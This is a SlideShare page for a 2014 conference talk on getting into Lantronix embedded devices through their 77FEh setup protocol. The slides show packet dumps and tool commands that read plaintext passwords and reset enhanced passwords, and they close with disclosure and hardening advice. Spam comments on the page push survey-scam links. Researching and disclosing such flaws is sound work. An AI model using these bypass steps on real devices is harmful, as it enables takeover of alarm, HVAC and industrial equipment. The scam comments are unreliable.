Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
1
Mos
Eisley
Lab
Confidence 2014
Exploring treasures of 77FEh
Getting access to Lantronix devices
Vlatko Kosturjak, Divert...
2
Mos
Eisley
Lab
Who are you!?!!??
●
Security Jedi at Diverto
–
Bringing balance to the force
●
Experience
–
Offensive (Pe...
3
Mos
Eisley
Lab
Agenda
●
Introduction - Lantronix
●
Physical access
●
WTF is 77FEh?
●
Vulnerabilities & Exploitation
●
Re...
4
Mos
Eisley
Lab
Lantronix
Source: www.lantronix.com
5
Mos
Eisley
Lab
You can find them as integral part
of
●
Alarms
●
HVACs
●
Pool monitoring systems
●
Sprinkler controllers
...
6
Mos
Eisley
Lab
What they are running actually?
●
OS
–
CoBos (mostly)
–
Evolution OS/Linux
–
ThreadX
–
Linux
●
Support
–
...
7
Mos
Eisley
Lab
Physical access
●
Like usual
–
Game over
●
Serial access
–
No password by design
●
Requirements
–
Standar...
8
Mos
Eisley
Lab
Connecting to serial port...
● 9600 bps 8/N/1
● Flow control: None
9
Mos
Eisley
Lab
Most frequent services Available –
TCP/IP
●
Web (tcp/80)
●
Telnet (tcp/9999)
●
77FEh (tcp-udp/30718)
●
SN...
10
Mos
Eisley
Lab
Device Discovery
●
Ask :)
●
Look if you have physical access
●
Passive
●
Active/Scanning
–
Standard port...
11
Mos
Eisley
Lab
Telnet administration
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Es...
12
Mos
Eisley
Lab
So, WTF is 77FEh finally?
●
0x77FE = 30718 (10)
●
TCP/UDP protocol for device setup
–
Proprietary protoc...
13
Mos
Eisley
Lab
Sample 77FEh communication
[v] Sending 4 bytes:
0x00000000 (00000) 000000f6 ....
[v] Received 30 bytes:
...
14
Mos
Eisley
Lab
Interesting request – #1
●
[v] Sending 4 bytes:
●
0x00000000 (00000) 000000f8 ....
●
●
[v] Received 124 ...
15
Mos
Eisley
Lab
Previous – work
●
Metasploit
–
Rob Vinson
●
http://robvinson.org/blog/2012/07/08/lantronix-serial-to-eth...
16
Mos
Eisley
Lab
But...
●
Simple password is not set
●
Device still asks for password
●
Further digging
–
Enhanced passwo...
17
Mos
Eisley
Lab
Introduction to enhanced passwords
Source: Lantronix documentation
Feature/Type Simple Password Enhanced...
18
Mos
Eisley
Lab
Source:
Mohdafri.
com
19
Mos
Eisley
Lab
Interesting request - #2
[v] Sending 4 bytes:
0x00000000 (00000) 000000f4 ....
[v] Received 32 bytes:
0x...
20
Mos
Eisley
Lab
Interesting request #3
●
Request to query
configuration
–
000000eX
●
Response to query
configuration
–
0...
21
Mos
Eisley
Lab
Interesting request #4
●
Request to change
configuration
–
000000cX +
followed by 126
bytes of setup
●
R...
22
Mos
Eisley
Lab
Setting setup record 1 for security
[v] Sending 130 bytes:
0x00000000 (00000) 000000c1 00000000 00000000...
23
Mos
Eisley
Lab
Enhanced password gone
no password to enter!
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connect...
24
Mos
Eisley
Lab
Authentication Algorithm Guess
Authenticate
Enhanced
Password
Simple
Password
Enhanced
Not set
Ask for e...
25
Mos
Eisley
Lab
New tool: lantronix-witchcraft
●
77FEh protocol implementation
●
77FEh security related utility
●
All th...
26
Mos
Eisley
Lab
Basic usage:
●
Display Mac address:
–
./lantronix-witchcraft.pl -Q <ip>
●
Display Simple Password (up to...
27
Mos
Eisley
Lab
Brave enough?
●
One command to rule them all
●
Display Mac address and simple password, dump setup
recor...
28
Mos
Eisley
Lab
Still wondering why automatic
scanning
is bad for Lantronix?
●
●
Dump of setup record:
00000030 00 1c 00...
29
Mos
Eisley
Lab
Correct way
●
Ask
–
Someone responsible if they could have something like that
●
Send broadcast query pa...
30
Mos
Eisley
Lab
It's not about Lantronix...
●
...they warned the vendors about it in their
documentation
Source: Lantron...
31
Mos
Eisley
Lab
Disclosure Problem
●
It's more about vendors who implement
Lantronix in their devices
●
Whom to report?
...
32
Mos
Eisley
Lab
But maybe it could be done...
●
Add white list
●
Encryption/SSL?
Source: Lantronix documentation
33
Mos
Eisley
Lab
Recommendations
●
Have some other device to VPN/SSL tunnel
the services
●
Telnet only through VPN or oth...
34
Mos
Eisley
Lab
Summary
Source: duki@fb
35
Mos
Eisley
Lab
Summary
●
There are ways to pass beyond authentication (if 77FEh is enabled)
–
Simple passwords
–
Enhanc...
36
Mos
Eisley
Lab
Acknowledgements - Thanks
●
Previous work (Simple Passwords)
–
Rob Vinson
●
http://robvinson.org/blog/20...
37
Mos
Eisley
Lab
Thank you!
Questions and Answers
@k0st
Upcoming SlideShare
Loading in …5
×

Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

4,110 views

Published on

Presentation presented at Confidence 2014 -
Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

Published in: Technology
  • Just got my check for $500, Sometimes people don't believe me when I tell them about how much you can make taking paid surveys online... So I took a video of myself actually getting paid $500 for paid surveys to finally set the record straight. I'm not going to leave this video up for long, so check it out now before I take it down! ◆◆◆ https://tinyurl.com/realmoneystreams2019
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Your opinions matter! get paid BIG $$$ for them! START NOW!!.. ▲▲▲ https://tinyurl.com/realmoneystreams2019
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Secrets to making $$$ with paid surveys... ■■■ http://ishbv.com/surveys6/pdf
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014

  1. 1. 1 Mos Eisley Lab Confidence 2014 Exploring treasures of 77FEh Getting access to Lantronix devices Vlatko Kosturjak, Diverto @k0st
  2. 2. 2 Mos Eisley Lab Who are you!?!!?? ● Security Jedi at Diverto – Bringing balance to the force ● Experience – Offensive (Penetration tester) – Defensive (Developer/System Administrator/...) – Have code in: Nmap, Metasploit, OpenVAS, … – Author of free software: https://github.com/kost/ ● If you trust in certificates – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
  3. 3. 3 Mos Eisley Lab Agenda ● Introduction - Lantronix ● Physical access ● WTF is 77FEh? ● Vulnerabilities & Exploitation ● Recommendations ● Questions and answers 45 minutes
  4. 4. 4 Mos Eisley Lab Lantronix Source: www.lantronix.com
  5. 5. 5 Mos Eisley Lab You can find them as integral part of ● Alarms ● HVACs ● Pool monitoring systems ● Sprinkler controllers ● Hacked vacuum cleaners - Roombas ● Embedded systems ● Industrial systems Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
  6. 6. 6 Mos Eisley Lab What they are running actually? ● OS – CoBos (mostly) – Evolution OS/Linux – ThreadX – Linux ● Support – 1 or more serial ports – Modbus (few models) – 10/100 Ethernet
  7. 7. 7 Mos Eisley Lab Physical access ● Like usual – Game over ● Serial access – No password by design ● Requirements – Standard TTL cable – BusPirate – ...
  8. 8. 8 Mos Eisley Lab Connecting to serial port... ● 9600 bps 8/N/1 ● Flow control: None
  9. 9. 9 Mos Eisley Lab Most frequent services Available – TCP/IP ● Web (tcp/80) ● Telnet (tcp/9999) ● 77FEh (tcp-udp/30718) ● SNMP (udp/161) Telnet administration interface What is this? Mostly information disclosures Simple web server Serving applet JAR which talks to 30718 port
  10. 10. 10 Mos Eisley Lab Device Discovery ● Ask :) ● Look if you have physical access ● Passive ● Active/Scanning – Standard port scanning is fine with conservative timing – Broadcast UDP to specific Lantronix ports (30718) ● Beware – Version scanning(-sV) or running vulnerability scanners may misconfigure device –
  11. 11. 11 Mos Eisley Lab Telnet administration $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Password :
  12. 12. 12 Mos Eisley Lab So, WTF is 77FEh finally? ● 0x77FE = 30718 (10) ● TCP/UDP protocol for device setup – Proprietary protocol – Used by DeviceInstaller (proprietary software from Lantronix) ● Designed for – Setup of device – Administration of device – Getting device info – Insecurity (sorry, had to write it, you'll see later ;) )
  13. 13. 13 Mos Eisley Lab Sample 77FEh communication [v] Sending 4 bytes: 0x00000000 (00000) 000000f6 .... [v] Received 30 bytes: (00000) 000000f7 00108005 58324400 df0e0000 ........X2D..... (00016) 62a7d944 00000000 00204a91 84fb b..D..... J... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip> Query setup request (4) Query setup response (4) MAC address of the device (6) Device type
  14. 14. 14 Mos Eisley Lab Interesting request – #1 ● [v] Sending 4 bytes: ● 0x00000000 (00000) 000000f8 .... ● ● [v] Received 124 bytes: ● 0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST ● 0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L........... ● 0x00000020 (00032) cc070000 00000000 00000000 00000000 ................ ● 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ ● 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ ● 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ ● 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ ● 0x00000070 (00112) 00000000 00000000 00000000 ............ Query setup (4) Simple Password In Plaintext (4) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip> IPv4 (4)
  15. 15. 15 Mos Eisley Lab Previous – work ● Metasploit – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant ● Tools – Simple C program by jgor ● https://github.com/jgor/lantronix-telnet-pw
  16. 16. 16 Mos Eisley Lab But... ● Simple password is not set ● Device still asks for password ● Further digging – Enhanced password in place – You cannot get/reset the enhanced password easily – Length is bigger (4->16) – Challenge!!!
  17. 17. 17 Mos Eisley Lab Introduction to enhanced passwords Source: Lantronix documentation Feature/Type Simple Password Enhanced Password Length 4 16 Visible in query setup yes no
  18. 18. 18 Mos Eisley Lab Source: Mohdafri. com
  19. 19. 19 Mos Eisley Lab Interesting request - #2 [v] Sending 4 bytes: 0x00000000 (00000) 000000f4 .... [v] Received 32 bytes: 0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST 0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3......... 0x00000020 (00032) ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip> Simple Password In Plaintext (4) Query ext version Request (4) Version (6)
  20. 20. 20 Mos Eisley Lab Interesting request #3 ● Request to query configuration – 000000eX ● Response to query configuration – 000000bX + followed by 126 bytes of setup – ● X=number of setup records (0 – F): – 0 basic setup record ● Simple password, IP... – 1 security record ● Enhanced password, AES key, SNMP... – 2 specific products / situations – 3 OEMs – ... Wrong! Request for security record 1 provides just zero bytes! HALF
  21. 21. 21 Mos Eisley Lab Interesting request #4 ● Request to change configuration – 000000cX + followed by 126 bytes of setup ● Response to change configuration – 000000bX – ● X=number of setup records (0 – F): – 0 basic setup record – 1 security record – 2 specific products / situations – 3 OEMs
  22. 22. 22 Mos Eisley Lab Setting setup record 1 for security [v] Sending 130 bytes: 0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................ 0x00000010 (00016) 00000000 00000000 00000000 00000000 ................ 0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public.... 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................ 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................ 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................ 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................ 0x00000070 (00112) 00000000 00000000 00000000 00000000 ................ 0x00000080 (00128) 0000 .. [v] Received 4 bytes: 0x00000000 (00000) 000000b1 .... ./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip> Setting Setup record 1 Was successful Set Setup record 1 (security) request SNMP Community String (13) Enhanced Password (16)
  23. 23. 23 Mos Eisley Lab Enhanced password gone no password to enter! $ telnet 192.168.1.101 9999 Trying 192.168.1.101... Connected to 192.168.1.101. Escape character is '^]'. MAC address DEADDEADDEAD Software version V5.8.8.3 (050801) XPTEXE AES library version 1.8.2.1 Press Enter for Setup Mode
  24. 24. 24 Mos Eisley Lab Authentication Algorithm Guess Authenticate Enhanced Password Simple Password Enhanced Not set Ask for enhanced Ask for simple Display setup menu Enhanced set Simple set Simple Not set Password OK
  25. 25. 25 Mos Eisley Lab New tool: lantronix-witchcraft ● 77FEh protocol implementation ● 77FEh security related utility ● All the tricks mentioned implemented ● Free software: GPL2 ● Requirement: Perl ● Available at – https://github.com/kost/lantronix-witchcraft
  26. 26. 26 Mos Eisley Lab Basic usage: ● Display Mac address: – ./lantronix-witchcraft.pl -Q <ip> ● Display Simple Password (up to 4 characters) – ./lantronix-witchcraft.pl -P <ip> ● Reset Security record (together with enhanced password) – ./lantronix-witchcraft.pl -E <ip> ● Reset Security record without AES (with enhanced password) – ./lantronix-witchcraft.pl -S <ip> ● Dump setup records – ./lantronix-witchcraft.pl -G -D <ip>
  27. 27. 27 Mos Eisley Lab Brave enough? ● One command to rule them all ● Display Mac address and simple password, dump setup records, reset security records together with enhanced password: – – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip> ●
  28. 28. 28 Mos Eisley Lab Still wondering why automatic scanning is bad for Lantronix? ● ● Dump of setup record: 00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y| 00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0| 00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{| 00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0| 00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
  29. 29. 29 Mos Eisley Lab Correct way ● Ask – Someone responsible if they could have something like that ● Send broadcast query packet to 77FEh ● Identify ports 30718 open (TCP or UDP) ● Dump setup records ● Play ;) ● Check if it is still working... – If yes, perfect – If not: huh, but you should restore setup records somehow ;)
  30. 30. 30 Mos Eisley Lab It's not about Lantronix... ● ...they warned the vendors about it in their documentation Source: Lantronix documentation
  31. 31. 31 Mos Eisley Lab Disclosure Problem ● It's more about vendors who implement Lantronix in their devices ● Whom to report? – Lantronix – I guess they know their protocol ;) – OEMs – hard to find all their customers ;) ● Awareness – Conference – Tools
  32. 32. 32 Mos Eisley Lab But maybe it could be done... ● Add white list ● Encryption/SSL? Source: Lantronix documentation
  33. 33. 33 Mos Eisley Lab Recommendations ● Have some other device to VPN/SSL tunnel the services ● Telnet only through VPN or other secure channel to administration interface ● Disable 77FEh if not needed ● Filter out 77FEh on network devices to only allowed ones ● Disable other unneccesary services (SNMP, telnet, etc).
  34. 34. 34 Mos Eisley Lab Summary Source: duki@fb
  35. 35. 35 Mos Eisley Lab Summary ● There are ways to pass beyond authentication (if 77FEh is enabled) – Simple passwords – Enhanced passwords ● Tools – Metasploit Lantronix modules – https://github.com/kost/lantronix-witchcraft ● Recommendations – Disable 77FEh if not needed or Filter out 77FEh on network devices to only allowed ones – Tunnel VPN/SSL all communication to these devices ● Future – There are things to research: way to obtain enhanced password or AES keys for example
  36. 36. 36 Mos Eisley Lab Acknowledgements - Thanks ● Previous work (Simple Passwords) – Rob Vinson ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne ● https://github.com/robvinson/metasploit-modules – Metasploit modules for simple passwords by jgor ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan ● https://github.com/jgor/lantronix-telnet-pw ● Colleagues – Dalibor Dosegović, hardware wizard
  37. 37. 37 Mos Eisley Lab Thank you! Questions and Answers @k0st

×